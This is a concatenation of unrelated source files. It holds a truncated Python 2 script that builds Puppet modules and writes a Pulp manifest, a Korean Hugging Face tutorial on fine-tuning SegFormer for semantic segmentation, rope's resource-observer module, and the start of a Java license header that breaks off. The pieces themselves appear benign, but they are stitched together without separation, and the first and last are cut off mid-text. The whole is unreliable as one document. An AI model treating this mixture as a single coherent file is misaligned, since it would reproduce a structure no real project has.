        ' will be cloned into the working directory. cloning will'
        ' set the (-p|--path) to the repository root when (-p|--path) is'
        ' not specified.')
BRANCH = _('the name of a git branch to be checked out.')
TAG = _('the name of a git tag to be checked out.')
WORKING_DIR = _('set the working directory. default: current directory.')
OUTPUT_DIR = _('set the output directory. this can be either an absolute path'
               ' or a path that is relative to the working directory.'
               ' default: working directory.')
CLEAN = _('delete cloned repositories before and after building.')
USAGE = _('%prog <options> [working-dir]')
DESCRIPTION = _(
    'Build puppet modules.'
    ' Search the working directory and build all puppet modules found. The working'
    ' directory is the current directory unless the (-w|--working-dir) option is specified.'
    ' The (-p|--path) option may be used to specify a directory to search/build and'
    ' can be either an absolute path or a path relative to the working directory.'
    ' The archive built using \'puppet module build\' is copied to the output directory'
    ' The output directory is the current directory unless (-o|--output-dir) is'
    ' specified. The output directory may be either an absolute path or a path that is'
    ' relative to the working directory.'
    ' \nSeveral options are provided for working with git. Repositories may be cloned'
    ' by specifying the (-u|--url) option. After cloning git repositories, the (-p|--path)'
    ' is set to the root of the cloned repository unless specified explicitly.'
    ' The repository branch may be selected by using the (-b|--branch) option.'
    ' In all cases, when the working directory is a git repository, a \'git pull\' is'
    ' performed to ensure that the repository is up to date.'
    '\n')
# Validation error messages.
BAD_PATH = _('(-p|--path) must be a relative path')
BAD_BRANCH_AND_TAG = _('(-b|--branch) and (-t|--tag) conflict')
def chdir(path):
"""
Change the working directory. The main purpose for this method
is to ignore path=None and display the change of directory to the user.
:param path: A directory path.
:type path: str
"""
if path:
print 'cd %s' % path
os.chdir(path)
def shell(command, exit_on_err=True):
"""
Invoke shell commands and return the exit-code and any
output written by the command to stdout.
:param command: The command to invoke.
:type command: str
:param exit_on_err: Exit the script if the command fails.
:type exit_on_err: bool
:return: (exit-code, output)
:rtype: tuple
"""
print command
call = command.split()
p = Popen(call, stdout=PIPE, stderr=PIPE)
status, output = p.wait(), p.stdout.read()
if exit_on_err and status != os.EX_OK:
print p.stderr.read()
sys.exit(status)
return status, output
def get_options():
"""
Parse and return command line options.
Sets defaults and validates options.
:return: The options passed by the user.
:rtype: optparse.Values
"""
parser = OptionParser(usage=USAGE, description=DESCRIPTION)
parser.add_option('-w', '--working-dir', dest='working_dir', help=WORKING_DIR)
parser.add_option('-o', '--output-dir', dest='output_dir', help=OUTPUT_DIR)
parser.add_option('-c', '--clean', default=False, action='store_true', help=CLEAN)
git = OptionGroup(parser, 'git')
git.add_option('-u', '--url', help=URL)
git.add_option('-b', '--branch', help=BRANCH)
git.add_option('-t', '--tag', help=TAG)
parser.add_option('-p', '--path', help=PATH)
parser.add_option_group(git)
(opts, args) = parser.parse_args()
# validate
if opts.path and opts.path.startswith('/'):
print BAD_PATH
sys.exit(os.EX_USAGE)
if opts.branch and opts.tag:
print BAD_BRANCH_AND_TAG
sys.exit(os.EX_USAGE)
# expand paths
if opts.working_dir:
opts.working_dir = os.path.expanduser(opts.working_dir)
if opts.output_dir:
opts.output_dir = os.path.expanduser(opts.output_dir)
# set defaults
if not opts.working_dir:
if args:
opts.working_dir = args[0]
else:
opts.working_dir = os.getcwd()
if not opts.output_dir:
opts.output_dir = opts.working_dir
return opts
def set_origin(options):
    """
    Detect whether the working-directory is a git repository
    and set the origin URL in the *options* passed in.
    ``options.origin`` is always defined afterwards (None when the URL
    cannot be determined) so callers can test it safely.
    :param options: The command line options.
    :type options: optparse.Options
    """
    # Default to None up front: previously the attribute was never set when
    # 'git remote show' succeeded but produced no 'Fetch URL:' line, which
    # made later options.origin accesses raise AttributeError.
    options.origin = None
    status, output = shell('git status', False)
    if status != 0:
        # not in a git repository
        return
    status, output = shell('git remote show -n origin')
    for line in output.split('\n'):
        line = line.strip()
        if line.startswith('Fetch URL:'):
            # split only on the first ':' so URLs containing ':' survive
            options.origin = line.split(':', 1)[1].strip()
            break
def git_clone(options):
    """
    Clone the git repository only if the user specified to do so using
    the (-u|--url) option. Assuming the user is cloning the repository
    for the purpose of building puppet modules within it, the *path* option
    is set to root of the cloned repository for convenience.
    :param options: The command line options.
    :type options: optparse.Options
    """
    if not options.url:
        # cloning not requested
        return
    shell('git clone --recursive %s' % options.url)
    if not options.path:
        path = os.path.basename(options.url)
        # Strip only a trailing '.git'. The previous path.split('.')[0]
        # truncated repository names containing dots (e.g. 'my.repo.git'
        # became 'my' instead of 'my.repo').
        if path.endswith('.git'):
            path = path[:-len('.git')]
        options.path = path
def git_checkout(options):
    """
    Perform a git checkout of a user specified branch or tag only if
    the working-directory is a git repository. A git-fetch is done prior
    to the checkout to ensure that branches and tags exist in the local
    repository. Finally, unless a tag has been checked out, a git-pull is
    performed to ensure the local repository is up to date with origin.
    :param options: The command line options.
    :type options: optparse.Options
    """
    if not options.origin:
        # not in a git repository
        return
    # make sure all remote branches and tags are known locally
    for refresh in ('git fetch', 'git fetch --tags'):
        shell(refresh)
    if options.branch:
        # a branch takes precedence over a tag and tracks origin
        shell('git checkout %s' % options.branch)
        shell('git pull')
    elif options.tag:
        # a tag is a fixed point; no pull afterwards
        shell('git checkout %s' % options.tag)
def find_modules():
    """
    Search for puppet (source) modules to build and return a list of paths.
    Puppet modules are identified by finding their metadata files. Once
    found, the *module* directory path is included in the result.
    :return: A set of puppet module directory paths.
    :rtype: set
    """
    modules = set()
    # Some old modules contain only 'Modulefile' metadata files, so find
    # both. The set will remove duplicates.
    status, output = shell('find . -name Modulefile -o -name metadata.json')
    for path in output.strip().split('\n'):
        path = path.strip()
        if not path:
            # 'find' matched nothing: splitting '' yields [''], which
            # previously added '' (and later built the empty path).
            continue
        path_pieces = path.split('/')
        # Puppet makes a PKG_DIR with a copy of the module when built, so
        # don't include those.
        if len(path_pieces) >= 3 and path_pieces[-3] == PKG_DIR:
            continue
        modules.add(os.path.dirname(path))
    return modules
def publish_module(module_dir, output_dir):
    """
    Publish built puppet modules.
    This mainly consists of copying the tarball from the pkg/
    directory to the user specified output directory. The
    output directory is created as needed.
    :param module_dir: The module source directory path.
    :type module_dir: str
    :param output_dir: The user specified output directory path.
    :type output_dir: str
    """
    shell('mkdir -p %s' % output_dir)
    # only the built archives are published
    archives = [n for n in os.listdir(module_dir) if n.endswith(ARCHIVE_SUFFIX)]
    for name in archives:
        shell('cp %s %s' % (os.path.join(module_dir, name), output_dir))
def build_puppet_modules(options):
    """
    Build puppet modules found during the search and publish
    (copy) them to the user specified output directory.
    :param options: The command line options.
    :type options: optparse.Options
    """
    for module_path in find_modules():
        shell('puppet module build %s' % module_path)
        # puppet drops the finished archive into <module>/pkg/
        publish_module(os.path.join(module_path, PKG_DIR), options.output_dir)
def digest(path):
    """
    Calculate the SHA256 hex digest for the file at the
    specified path.
    :param path: An absolute path to a file.
    :type path: str
    :return: The hex digest.
    :rtype: str
    """
    h = sha256()
    # Open in binary mode: hashing must see the raw bytes (text mode would
    # translate line endings on some platforms and fails outright on
    # Python 3), and read in chunks so large archives are not pulled into
    # memory at once.
    with open(path, 'rb') as fp:
        while True:
            chunk = fp.read(1 << 20)
            if not chunk:
                break
            h.update(chunk)
    return h.hexdigest()
def build_manifest(options):
    """
    Build the pulp manifest.
    The pulp manifest is a file listing the built puppet tarballs.
    Each file is listed as an entry on a separate line and has the
    format of: <name>,<sha256>,<size>.
    :param options: The command line options.
    :type options: optparse.Options
    """
    saved_dir = os.getcwd()
    chdir(options.output_dir)
    with open('PULP_MANIFEST', 'w+') as fp:
        for name in os.listdir('.'):
            if not name.endswith(ARCHIVE_SUFFIX):
                continue
            fp.write('%s,%s,%s\n' % (name, digest(name), os.path.getsize(name)))
    chdir(saved_dir)
def clean(options):
    """
    Clean up before and after building when specified by the
    user (-c|clean) command line option.
    :param options: The command line options.
    :type options: optparse.Options
    """
    if not (options.url and options.clean):
        # only cloned repositories are ever removed, and only on request
        return
    clone_dir = os.path.join(options.working_dir, os.path.basename(options.url))
    shell('rm -rf %s' % clone_dir)
def main():
    """
    The command entry point.
    Runs the clone/checkout/build/publish pipeline and restores the
    starting directory afterwards.
    """
    starting_dir = os.getcwd()
    options = get_options()
    clean(options)  # pre-build cleanup (when requested)
    chdir(options.working_dir)
    git_clone(options)
    chdir(options.path)
    set_origin(options)
    git_checkout(options)
    build_puppet_modules(options)
    build_manifest(options)
    chdir(starting_dir)
    clean(options)  # post-build cleanup (when requested)
<!--Copyright 2022 The HuggingFace Team. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
⚠️ Note that this file is in Markdown but contain specific syntax for our doc-builder (similar to MDX) that may not be
rendered properly in your Markdown viewer.
-->
# 의미적 분할(Semantic segmentation)[[semantic-segmentation]]
[[open-in-colab]]
<Youtube id="dKE8SIt9C-w"/>
의미적 분할(semantic segmentation)은 이미지의 각 픽셀에 레이블 또는 클래스를 할당합니다. 분할(segmentation)에는 여러 종류가 있으며, 의미적 분할의 경우 동일한 물체의 고유 인스턴스를 구분하지 않습니다. 두 물체 모두 동일한 레이블이 지정됩니다(예시로, "car-1" 과 "car-2" 대신 "car"로 지정합니다).
실생활에서 흔히 볼 수 있는 의미적 분할의 적용 사례로는 보행자와 중요한 교통 정보를 식별하는 자율 주행 자동차 학습, 의료 이미지의 세포와 이상 징후 식별, 그리고 위성 이미지의 환경 변화 모니터링등이 있습니다.
이번 가이드에서 배울 내용은 다음과 같습니다:
1. [SceneParse150](https://huggingface.co/datasets/scene_parse_150) 데이터 세트를 이용해 [SegFormer](https://huggingface.co/docs/transformers/main/en/model_doc/segformer#segformer) 미세 조정하기.
2. 미세 조정된 모델을 추론에 사용하기.
<Tip>
이 작업과 호환되는 모든 아키텍처와 체크포인트를 보려면 [작업 페이지](https://huggingface.co/tasks/image-segmentation)를 확인하는 것이 좋습니다.
</Tip>
시작하기 전에 필요한 모든 라이브러리가 설치되었는지 확인하세요:
```bash
pip install -q datasets transformers evaluate
```
커뮤니티에 모델을 업로드하고 공유할 수 있도록 Hugging Face 계정에 로그인하는 것을 권장합니다. 프롬프트가 나타나면 토큰을 입력하여 로그인하세요:
```py
>>> from huggingface_hub import notebook_login
>>> notebook_login()
```
## SceneParse150 데이터 세트 불러오기[[load-sceneparse150-dataset]]
🤗 Datasets 라이브러리에서 SceneParse150 데이터 세트의 더 작은 부분 집합을 가져오는 것으로 시작합니다. 이렇게 하면 데이터 세트 전체에 대한 훈련에 많은 시간을 할애하기 전에 실험을 통해 모든 것이 제대로 작동하는지 확인할 수 있습니다.
```py
>>> from datasets import load_dataset
>>> ds = load_dataset("scene_parse_150", split="train[:50]")
```
데이터 세트의 `train`을 [`~datasets.Dataset.train_test_split`] 메소드를 사용하여 훈련 및 테스트 세트로 분할하세요:
```py
>>> ds = ds.train_test_split(test_size=0.2)
>>> train_ds = ds["train"]
>>> test_ds = ds["test"]
```
그리고 예시를 살펴보세요:
```py
>>> train_ds[0]
{'image': <PIL.JpegImagePlugin.JpegImageFile image mode=RGB size=512x683 at 0x7F9B0C201F90>,
'annotation': <PIL.PngImagePlugin.PngImageFile image mode=L size=512x683 at 0x7F9B0C201DD0>,
'scene_category': 368}
```
- `image`: 장면의 PIL 이미지입니다.
- `annotation`: 분할 지도(segmentation map)의 PIL 이미지입니다. 모델의 타겟이기도 합니다.
- `scene_category`: "주방" 또는 "사무실"과 같이 이미지 장면을 설명하는 카테고리 ID입니다. 이 가이드에서는 둘 다 PIL 이미지인 `image`와 `annotation`만을 사용합니다.
나중에 모델을 설정할 때 유용하게 사용할 수 있도록 레이블 ID를 레이블 클래스에 매핑하는 사전도 만들고 싶을 것입니다. Hub에서 매핑을 다운로드하고 `id2label` 및 `label2id` 사전을 만드세요:
```py
>>> import json
>>> from pathlib import Path
>>> from huggingface_hub import hf_hub_download
>>> repo_id = "huggingface/label-files"
>>> filename = "ade20k-id2label.json"
>>> id2label = json.loads(Path(hf_hub_download(repo_id, filename, repo_type="dataset")).read_text())
>>> id2label = {int(k): v for k, v in id2label.items()}
>>> label2id = {v: k for k, v in id2label.items()}
>>> num_labels = len(id2label)
```
## 전처리하기[[preprocess]]
다음 단계는 모델에 사용할 이미지와 주석을 준비하기 위해 SegFormer 이미지 프로세서를 불러오는 것입니다. 우리가 사용하는 데이터 세트와 같은 일부 데이터 세트는 배경 클래스로 제로 인덱스를 사용합니다. 하지만 배경 클래스는 150개의 클래스에 실제로는 포함되지 않기 때문에 `do_reduce_labels=True` 를 설정해 모든 레이블에서 배경 클래스를 제거해야 합니다. 제로 인덱스는 `255`로 대체되므로 SegFormer의 손실 함수에서 무시됩니다:
```py
>>> from transformers import AutoImageProcessor
>>> checkpoint = "nvidia/mit-b0"
>>> image_processor = AutoImageProcessor.from_pretrained(checkpoint, do_reduce_labels=True)
```
이미지 데이터 세트에 데이터 증강을 적용하여 과적합에 대해 모델을 보다 강건하게 만드는 것이 일반적입니다. 이 가이드에서는 [torchvision](https://pytorch.org/vision/stable/index.html)의 [`ColorJitter`](https://pytorch.org/vision/stable/generated/torchvision.transforms.ColorJitter.html)를 사용하여 이미지의 색상 속성을 임의로 변경합니다. 하지만, 자신이 원하는 이미지 라이브러리를 사용할 수도 있습니다.
```py
>>> from torchvision.transforms import ColorJitter
>>> jitter = ColorJitter(brightness=0.25, contrast=0.25, saturation=0.25, hue=0.1)
```
이제 모델에 사용할 이미지와 주석을 준비하기 위해 두 개의 전처리 함수를 만듭니다. 이 함수들은 이미지를 `pixel_values`로, 주석을 `labels`로 변환합니다. 훈련 세트의 경우 이미지 프로세서에 이미지를 제공하기 전에 `jitter`를 적용합니다. 테스트 세트의 경우 이미지 프로세서는 `images`를 자르고 정규화하며, 테스트 중에는 데이터 증강이 적용되지 않으므로 `labels`만 자릅니다.
```py
>>> def train_transforms(example_batch):
... images = [jitter(x) for x in example_batch["image"]]
... labels = [x for x in example_batch["annotation"]]
... inputs = image_processor(images, labels)
... return inputs
>>> def val_transforms(example_batch):
... images = [x for x in example_batch["image"]]
... labels = [x for x in example_batch["annotation"]]
... inputs = image_processor(images, labels)
... return inputs
```
모든 데이터 세트에 `jitter`를 적용하려면, 🤗 Datasets [`~datasets.Dataset.set_transform`] 함수를 사용하세요. 즉시 변환이 적용되기 때문에 더 빠르고 디스크 공간을 덜 차지합니다:
```py
>>> train_ds.set_transform(train_transforms)
>>> test_ds.set_transform(val_transforms)
```
## 평가하기[[evaluate]]
훈련 중에 메트릭을 포함하면 모델의 성능을 평가하는 데 도움이 되는 경우가 많습니다. 🤗 [Evaluate](https://huggingface.co/docs/evaluate/index) 라이브러리를 사용하여 평가 방법을 빠르게 로드할 수 있습니다. 이 태스크에서는 [mean Intersection over Union](https://huggingface.co/spaces/evaluate-metric/mean_iou) (IoU) 메트릭을 로드하세요 (메트릭을 로드하고 계산하는 방법에 대해 자세히 알아보려면 🤗 Evaluate [quick tour](https://huggingface.co/docs/evaluate/a_quick_tour)를 살펴보세요).
```py
>>> import evaluate
>>> metric = evaluate.load("mean_iou")
```
그런 다음 메트릭을 [`~evaluate.EvaluationModule.compute`]하는 함수를 만듭니다. 예측을 먼저 로짓으로 변환한 다음, 레이블의 크기에 맞게 모양을 다시 지정해야 [`~evaluate.EvaluationModule.compute`]를 호출할 수 있습니다:
```py
>>> import numpy as np
>>> import torch
>>> from torch import nn
>>> def compute_metrics(eval_pred):
... with torch.no_grad():
... logits, labels = eval_pred
... logits_tensor = torch.from_numpy(logits)
... logits_tensor = nn.functional.interpolate(
... logits_tensor,
... size=labels.shape[-2:],
... mode="bilinear",
... align_corners=False,
... ).argmax(dim=1)
... pred_labels = logits_tensor.detach().cpu().numpy()
... metrics = metric.compute(
... predictions=pred_labels,
... references=labels,
... num_labels=num_labels,
... ignore_index=255,
... reduce_labels=False,
... )
... for key, value in metrics.items():
... if isinstance(value, np.ndarray):
... metrics[key] = value.tolist()
... return metrics
```
이제 `compute_metrics` 함수를 사용할 준비가 되었습니다. 트레이닝을 설정할 때 이 함수로 돌아가게 됩니다.
## 학습하기[[train]]
<Tip>
만약 [`Trainer`]를 사용해 모델을 미세 조정하는 것에 익숙하지 않다면, [여기](../training#finetune-with-trainer)에서 기본 튜토리얼을 살펴보세요!
</Tip>
이제 모델 학습을 시작할 준비가 되었습니다! [`AutoModelForSemanticSegmentation`]로 SegFormer를 불러오고, 모델에 레이블 ID와 레이블 클래스 간의 매핑을 전달합니다:
```py
>>> from transformers import AutoModelForSemanticSegmentation, TrainingArguments, Trainer
>>> model = AutoModelForSemanticSegmentation.from_pretrained(checkpoint, id2label=id2label, label2id=label2id)
```
이제 세 단계만 남았습니다:
1. 학습 하이퍼파라미터를 [`TrainingArguments`]에 정의합니다. `image` 열이 삭제되기 때문에 사용하지 않는 열을 제거하지 않는 것이 중요합니다. `image` 열이 없으면 `pixel_values`을 생성할 수 없습니다. 이런 경우를 방지하려면 `remove_unused_columns=False`로 설정하세요! 유일하게 필요한 다른 매개변수는 모델을 저장할 위치를 지정하는 `output_dir`입니다. `push_to_hub=True`를 설정하여 이 모델을 Hub에 푸시합니다(모델을 업로드하려면 Hugging Face에 로그인해야 합니다). 각 에포크가 끝날 때마다 [`Trainer`]가 IoU 메트릭을 평가하고 학습 체크포인트를 저장합니다.
2. 모델, 데이터 세트, 토크나이저, 데이터 콜레이터, `compute_metrics` 함수와 함께 학습 인자를 [`Trainer`]에 전달하세요.
3. 모델을 미세 조정하기 위해 [`~Trainer.train`]를 호출하세요.
```py
>>> training_args = TrainingArguments(
... output_dir="segformer-b0-scene-parse-150",
... learning_rate=6e-5,
... num_train_epochs=50,
... per_device_train_batch_size=2,
... per_device_eval_batch_size=2,
... save_total_limit=3,
... eval_strategy="steps",
... save_strategy="steps",
... save_steps=20,
... eval_steps=20,
... logging_steps=1,
... eval_accumulation_steps=5,
... remove_unused_columns=False,
... push_to_hub=True,
... )
>>> trainer = Trainer(
... model=model,
... args=training_args,
... train_dataset=train_ds,
... eval_dataset=test_ds,
... compute_metrics=compute_metrics,
... )
>>> trainer.train()
```
학습이 완료되면, 누구나 모델을 사용할 수 있도록 [`~transformers.Trainer.push_to_hub`] 메서드를 사용해 Hub에 모델을 공유하세요:
```py
>>> trainer.push_to_hub()
```
## 추론하기[[inference]]
이제 모델을 미세 조정했으니 추론에 사용할 수 있습니다!
추론할 이미지를 로드하세요:
```py
>>> image = ds[0]["image"]
>>> image
```
<div class="flex justify-center">
<img src="https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/semantic-seg-image.png" alt="Image of bedroom"/>
</div>
추론을 위해 미세 조정한 모델을 시험해 보는 가장 간단한 방법은 [`pipeline`]에서 사용하는 것입니다. 모델을 사용하여 이미지 분할을 위한 `pipeline`을 인스턴스화하고 이미지를 전달합니다:
```py
>>> from transformers import pipeline
>>> segmenter = pipeline("image-segmentation", model="my_awesome_seg_model")
>>> segmenter(image)
[{'score': None,
'label': 'wall',
'mask': <PIL.Image.Image image mode=L size=640x427 at 0x7FD5B2062690>},
{'score': None,
'label': 'sky',
'mask': <PIL.Image.Image image mode=L size=640x427 at 0x7FD5B2062A50>},
{'score': None,
'label': 'floor',
'mask': <PIL.Image.Image image mode=L size=640x427 at 0x7FD5B2062B50>},
{'score': None,
'label': 'ceiling',
'mask': <PIL.Image.Image image mode=L size=640x427 at 0x7FD5B2062A10>},
{'score': None,
'label': 'bed ',
'mask': <PIL.Image.Image image mode=L size=640x427 at 0x7FD5B2062E90>},
{'score': None,
'label': 'windowpane',
'mask': <PIL.Image.Image image mode=L size=640x427 at 0x7FD5B2062390>},
{'score': None,
'label': 'cabinet',
'mask': <PIL.Image.Image image mode=L size=640x427 at 0x7FD5B2062550>},
{'score': None,
'label': 'chair',
'mask': <PIL.Image.Image image mode=L size=640x427 at 0x7FD5B2062D90>},
{'score': None,
'label': 'armchair',
'mask': <PIL.Image.Image image mode=L size=640x427 at 0x7FD5B2062E10>}]
```
원하는 경우 `pipeline`의 결과를 수동으로 복제할 수도 있습니다. 이미지 프로세서로 이미지를 처리하고 `pixel_values`을 GPU에 배치합니다:
```py
>>> device = torch.device("cuda" if torch.cuda.is_available() else "cpu") # 가능하다면 GPU를 사용하고, 그렇지 않다면 CPU를 사용하세요
>>> encoding = image_processor(image, return_tensors="pt")
>>> pixel_values = encoding.pixel_values.to(device)
```
모델에 입력을 전달하고 `logits`를 반환합니다:
```py
>>> outputs = model(pixel_values=pixel_values)
>>> logits = outputs.logits.cpu()
```
그런 다음 로짓의 크기를 원본 이미지 크기로 다시 조정합니다:
```py
>>> upsampled_logits = nn.functional.interpolate(
... logits,
... size=image.size[::-1],
... mode="bilinear",
... align_corners=False,
... )
>>> pred_seg = upsampled_logits.argmax(dim=1)[0]
```
결과를 시각화하려면 [dataset color palette](https://github.com/tensorflow/models/blob/3f1ca33afe3c1631b733ea7e40c294273b9e406d/research/deeplab/utils/get_dataset_colormap.py#L51)를 각 클래스를 RGB 값에 매핑하는 `ade_palette()`로 로드합니다. 그런 다음 이미지와 예측된 분할 지도(segmentation map)을 결합하여 구성할 수 있습니다:
```py
>>> import matplotlib.pyplot as plt
>>> import numpy as np
>>> color_seg = np.zeros((pred_seg.shape[0], pred_seg.shape[1], 3), dtype=np.uint8)
>>> palette = np.array(ade_palette())
>>> for label, color in enumerate(palette):
... color_seg[pred_seg == label, :] = color
>>> color_seg = color_seg[..., ::-1] # BGR로 변환
>>> img = np.array(image) * 0.5 + color_seg * 0.5 # 분할 지도으로 이미지 구성
>>> img = img.astype(np.uint8)
>>> plt.figure(figsize=(15, 10))
>>> plt.imshow(img)
>>> plt.show()
```
<div class="flex justify-center">
<img src="https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/semantic-seg-preds.png" alt="Image of bedroom overlaid with segmentation map"/>
</div> | unknown | github | https://github.com/huggingface/transformers | docs/source/ko/tasks/semantic_segmentation.md |
import os
class ResourceObserver(object):
    """Provides the interface for observing resources

    Observers of this kind can be registered using
    ``Project.add_observer()``, though `FilteredResourceObserver` is
    usually the better choice.  A plain observer reports exactly the
    changes passed to it and does not fan a change out to child
    resources; for example, when a folder is removed only ``removed()``
    is called for that folder and not for its contents.  Use
    `FilteredResourceObserver` to watch a specific list of resources and
    receive per-resource notifications.
    """

    def __init__(self, changed=None, moved=None, created=None,
                 removed=None, validate=None):
        self.changed = changed
        self.moved = moved
        self.created = created
        self.removed = removed
        self._validate = validate

    def resource_changed(self, resource):
        """It is called when the resource changes"""
        if self.changed is None:
            return
        self.changed(resource)

    def resource_moved(self, resource, new_resource):
        """It is called when a resource is moved"""
        if self.moved is None:
            return
        self.moved(resource, new_resource)

    def resource_created(self, resource):
        """Is called when a new resource is created"""
        if self.created is None:
            return
        self.created(resource)

    def resource_removed(self, resource):
        """Is called when a resource is removed"""
        if self.removed is None:
            return
        self.removed(resource)

    def validate(self, resource):
        """Validate the existence of this resource and its children.

        This function is called when rope needs to update its resource
        cache about files that might have been changed or removed by
        other processes.
        """
        if self._validate is None:
            return
        self._validate(resource)
class FilteredResourceObserver(object):
    """A useful decorator for `ResourceObserver`

    Most resource observers have a list of resources and are
    interested only in changes to those files.  This class satisfies
    this need.  It dispatches resource changed and removed messages.
    It performs these tasks:

    * Changes to files and folders are analyzed to check whether any
      of the interesting resources are changed or not.  If they are,
      it reports these changes to `resource_observer` passed to the
      constructor.
    * When a resource is removed it checks whether any of the
      interesting resources are contained in that folder and reports
      them to `resource_observer`.
    * When validating a folder it validates all of the interesting
      files in that folder.

    Since most resource observers are interested in a list of
    resources that change over time, `add_resource` and
    `remove_resource` might be useful.
    """

    def __init__(self, resource_observer, initial_resources=None,
                 timekeeper=None):
        self.observer = resource_observer
        # Maps each watched resource to the indicator captured when it was
        # last observed (see `ChangeIndicator`); None means the resource
        # did not exist at that time.
        self.resources = {}
        if timekeeper is not None:
            self.timekeeper = timekeeper
        else:
            self.timekeeper = ChangeIndicator()
        if initial_resources is not None:
            for resource in initial_resources:
                self.add_resource(resource)

    def add_resource(self, resource):
        """Add a resource to the list of interesting resources"""
        if resource.exists():
            self.resources[resource] = self.timekeeper.get_indicator(resource)
        else:
            # Remember missing resources too, so their later creation can
            # be detected during validate().
            self.resources[resource] = None

    def remove_resource(self, resource):
        """Remove a resource from the list of interesting resources"""
        if resource in self.resources:
            del self.resources[resource]

    def clear_resources(self):
        """Removes all registered resources"""
        self.resources.clear()

    def resource_changed(self, resource):
        """Report *resource* (and possibly its watched parent) as changed."""
        changes = _Changes()
        self._update_changes_caused_by_changed(changes, resource)
        self._perform_changes(changes)

    def _update_changes_caused_by_changed(self, changes, changed):
        # A change is interesting when the resource itself is watched or
        # when its parent folder is watched (a folder "changes" when its
        # children do).
        if changed in self.resources:
            changes.add_changed(changed)
        if self._is_parent_changed(changed):
            changes.add_changed(changed.parent)

    def _update_changes_caused_by_moved(self, changes, resource,
                                        new_resource=None):
        # new_resource is None when the move is really a removal.
        if resource in self.resources:
            changes.add_removed(resource, new_resource)
        if new_resource in self.resources:
            changes.add_created(new_resource)
        if resource.is_folder():
            # Moving/removing a folder implicitly moves/removes every
            # watched resource inside it.
            for file in list(self.resources):
                if resource.contains(file):
                    new_file = self._calculate_new_resource(
                        resource, new_resource, file)
                    changes.add_removed(file, new_file)
        if self._is_parent_changed(resource):
            changes.add_changed(resource.parent)
        if new_resource is not None:
            if self._is_parent_changed(new_resource):
                changes.add_changed(new_resource.parent)

    def _is_parent_changed(self, child):
        # True when the parent folder of *child* is itself watched.
        return child.parent in self.resources

    def resource_moved(self, resource, new_resource):
        """Report *resource* as moved to *new_resource*."""
        changes = _Changes()
        self._update_changes_caused_by_moved(changes, resource, new_resource)
        self._perform_changes(changes)

    def resource_created(self, resource):
        """Report *resource* as newly created."""
        changes = _Changes()
        self._update_changes_caused_by_created(changes, resource)
        self._perform_changes(changes)

    def _update_changes_caused_by_created(self, changes, resource):
        if resource in self.resources:
            changes.add_created(resource)
        if self._is_parent_changed(resource):
            changes.add_changed(resource.parent)

    def resource_removed(self, resource):
        """Report *resource* as removed (handled as a move to nowhere)."""
        changes = _Changes()
        self._update_changes_caused_by_moved(changes, resource)
        self._perform_changes(changes)

    def _perform_changes(self, changes):
        # Dispatch the collected changes to the wrapped observer and
        # refresh the stored indicators so subsequent validations compare
        # against the new state.
        for resource in changes.changes:
            self.observer.resource_changed(resource)
            self.resources[resource] = self.timekeeper.get_indicator(resource)
        for resource, new_resource in changes.moves.items():
            self.resources[resource] = None
            if new_resource is not None:
                self.observer.resource_moved(resource, new_resource)
            else:
                self.observer.resource_removed(resource)
        for resource in changes.creations:
            self.observer.resource_created(resource)
            self.resources[resource] = self.timekeeper.get_indicator(resource)

    def validate(self, resource):
        """Search for changes under *resource* and report them.

        Called when rope needs to update its resource cache about files
        that might have been changed or removed by other processes.
        """
        changes = _Changes()
        for file in self._search_resource_moves(resource):
            if file in self.resources:
                self._update_changes_caused_by_moved(changes, file)
        for file in self._search_resource_changes(resource):
            if file in self.resources:
                self._update_changes_caused_by_changed(changes, file)
        for file in self._search_resource_creations(resource):
            if file in self.resources:
                changes.add_created(file)
        self._perform_changes(changes)

    def _search_resource_creations(self, resource):
        # Watched resources recorded as missing (indicator None) that now
        # exist must have been created since the last observation.
        creations = set()
        if resource in self.resources and resource.exists() and \
           self.resources[resource] is None:
            creations.add(resource)
        if resource.is_folder():
            for file in self.resources:
                if file.exists() and resource.contains(file) and \
                   self.resources[file] is None:
                    creations.add(file)
        return creations

    def _search_resource_moves(self, resource):
        # Watched resources that no longer exist have been moved/removed.
        all_moved = set()
        if resource in self.resources and not resource.exists():
            all_moved.add(resource)
        if resource.is_folder():
            for file in self.resources:
                if resource.contains(file):
                    if not file.exists():
                        all_moved.add(file)
        # Keep only the outermost moved folders; their contents are
        # reported implicitly by _update_changes_caused_by_moved().
        moved = set(all_moved)
        for folder in [file for file in all_moved if file.is_folder()]:
            if folder in moved:
                for file in list(moved):
                    if folder.contains(file):
                        moved.remove(file)
        return moved

    def _search_resource_changes(self, resource):
        # Compare current indicators with the stored ones to find changes.
        changed = set()
        if resource in self.resources and self._is_changed(resource):
            changed.add(resource)
        if resource.is_folder():
            for file in self.resources:
                if file.exists() and resource.contains(file):
                    if self._is_changed(file):
                        changed.add(file)
        return changed

    def _is_changed(self, resource):
        # A resource recorded as missing cannot be "changed" (only created).
        if self.resources[resource] is None:
            return False
        return self.resources[resource] != self.timekeeper.get_indicator(resource)

    def _calculate_new_resource(self, main, new_main, resource):
        # Map *resource* (inside the moved folder *main*) to its new
        # location under *new_main*; None when the folder was removed.
        if new_main is None:
            return None
        diff = resource.path[len(main.path):]
        return resource.project.get_resource(new_main.path + diff)
class ChangeIndicator(object):

    def get_indicator(self, resource):
        """Return the modification time and size of a `Resource`."""
        path = resource.real_path
        mtime = os.path.getmtime(path)
        size = os.path.getsize(path)
        # on dos, mtime does not change for a folder when files are added,
        # so the entry count is folded into the indicator as well
        if os.name != 'posix' and os.path.isdir(path):
            return (mtime, len(os.listdir(path)), size)
        return (mtime, size)
class _Changes(object):
    """Accumulator used by `FilteredResourceObserver` to collect the
    changed, created and moved/removed resources of one notification
    before they are dispatched by ``_perform_changes()``."""

    def __init__(self):
        self.changes = set()
        self.creations = set()
        # Maps a removed/moved resource to its destination (None for a
        # plain removal).
        self.moves = {}

    def add_changed(self, resource):
        self.changes.add(resource)

    def add_removed(self, resource, new_resource=None):
        self.moves[resource] = new_resource

    def add_created(self, resource):
        self.creations.add(resource)
/*
* Copyright 2002-present the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
